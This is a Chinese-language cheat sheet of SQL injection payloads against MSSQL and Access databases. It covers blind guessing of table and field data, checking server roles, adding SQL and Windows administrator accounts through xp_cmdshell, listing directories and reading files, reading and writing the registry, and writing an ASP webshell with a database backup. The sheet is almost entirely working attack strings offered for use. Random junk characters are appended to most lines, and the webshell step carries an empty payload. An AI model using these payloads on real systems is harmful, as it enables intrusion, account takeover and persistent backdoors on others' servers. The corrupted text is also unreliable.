1.判断是否有注入;and 1=1 ;and 1=2 h&5bMW
2.初步判断是否是mssql ;and user>0 rdj_3Utv
c,@&Z#IZ`
3.注入参数是字符'and [查询条件] and ''=' S +wy^x@@
l$[7pM[
4.搜索时没过滤参数的'and [查询条件] and '%25'=' Oly"ll*K
Y7*8 A,
5.判断数据库系统 6gfn5G
=n@"lY u[
;and (select count(*) from sysobjects)>0 mssql )ZZjuFQJ)
wPr9N}rf
;and (select count(*) from msysobjects)>0 access Ygeg[S!7
Q)]C~Q
t)qu@m?FZ)
HpLCOY1-
6.猜数据库 ;and (select Count(*) from [数据库名])>0 B'NtG84
VrQgn9L
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 xE>jlr?
_PPZ!r(
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 FS'|e?WU
8-#_xsZ^;
9.(1)猜字段的ascii值(access) ov3FKMG?
PI G3kJ
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 nm#ISueh
?Z^?A^; }$
(2)猜字段的ascii值(mssql) ~Un+Zs%24
8Cx6Me>,=
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0
lL\%eQ
YL?2gBT
10.测试权限结构(mssql) 5&
2([
z:Y
Z]
,r5'nDV=d
r!+..c
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- QT8GP?F
C4[) yJ
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- Yamu"#
X&LaAqlSG
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- k2 _i;v
cePe0\\
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- 6
4,('+
;OMR5KAz
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- @GVONluyU`
CE5A^,EsB
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- hr@kU x
$.+_f,tU
;and 1=(select IS_MEMBER('db_owner'));-- kuq&8f~!
42oW]b%P{;
B}(r>8?dm
~:JoKm`vU
11.添加mssql和系统的帐户 ?<;9=l\Q
QjlQsN!
;exec master.dbo.sp_addlogin username;-- 8l.bT|#O
;exec master.dbo.sp_password null,username,password;-- @k-C>h()C
s'4O]k`
;exec master.dbo.sp_addsrvrolemember sysadmin username;--
WrHY'
L*6R5i>
;exec master.dbo.xp_cmdshell 'net user username password fzdWM:g
eIDrN%3
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 11^.oa+`
H*H~~yQ
;exec master.dbo.xp_cmdshell 'net user username password /add';-- MD):g@
;!hwcO kX
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- {{r.?m#{
&wa2MNCG8
,*kh{lJ
Y&uwi:_g
12.(1)遍历目录 h}y]Pt?
%O|+`"
;create table dirs(paths varchar(100), id int) 0SV<Pl^
eF"k"Ckt'
;insert dirs exec master.dbo.xp_dirtree 'c:\' 3<x1s2U
$2E&~W %
;and (select top 1 paths from dirs)>0 41v#|%\w
ey]WoUZ
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) <*Gd0 v%
a$=He
Ro@=oyLE
Lcz`
(2)遍历目录 V8hmfV~=]P
F$j?}
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- G"F)t(iX
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 ( 5 BZZ
^'ws/(
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 [xdi.6%
|}o6N5)
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 cx~XG
8w$q4fg0
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 j4:Xel/
60R]Q
/UqIkc
4 KX\'K
13.mssql中的存储过程 %Ze]6TP/><
LO;?#e7
xp_regenumvalues 注册表根键, 子键 |jB/d@RE
9i46u20
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 Z8ds`KZM
5m
yQBKE
xp_regread 根键,子键,键值名 MW2{w<-]7
`F$lO2 #k
;exec xp_regread =[:pm)
iv
~<me0F
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 7O-fc1OTv
m%cwhH_B
xp_regwrite 根键,子键, 值名, 值类型, 值 FL{$9o\@
}60/5HNr
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 3UX6 Y]E3
FN/siw(?3
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 hCb2<_3CR
r4M;]
xp_regdeletevalue 根键,子键,值名 .*X=JFxl
c2u*<x
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 {G+iobQdd
]
T<#bNK\1
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 [(2XL"4D
jN AS'JV
6~-,.{Y
IuY4R0Go
14.mssql的backup创建webshell BS=~G+/:|
lhPxMMS`j
use model 4"pU\g
u`;P^t5
create table cmd(str image); FR']Rj
sp&gw XPG
insert into cmd(str) values (''); ]*hH.ZBY"^
P*]hXm85[K
backup database model to disk='c:\l.asp'; A">R-1R
}tO>&$
Z6f
)x<BeD
F/cA tT.M?
15.mssql内置函数 -wr_x<7
-zzoz x]S=
;and (select @@version)>0 获得Windows的版本号 %NDr5E^cc
,h9?o
;and user_name()='dbo' 判断当前系统的连接用户是不是sa &O5O@3:7]
`nRF"T_
;and (select user_name())>0 爆当前系统的连接用户 +{#L,0t
Us.k,
;and (select db_name())>0 得到当前连接的数据库 Ae%AG@L
_\gCdNrD
@*E=O |
Sf*gAwnW
16.简洁的webshell ME66BWg{
<.2jQ#So
use model lPD&Doa
pL . 0_
create table cmd(str image); !X9^ L^v}
^zW=s$\Fo
insert into cmd(str) values (''); e$Mvl=NYp\
\EXa 9X2
backup database model to disk='g:\wwwtest\l.asp';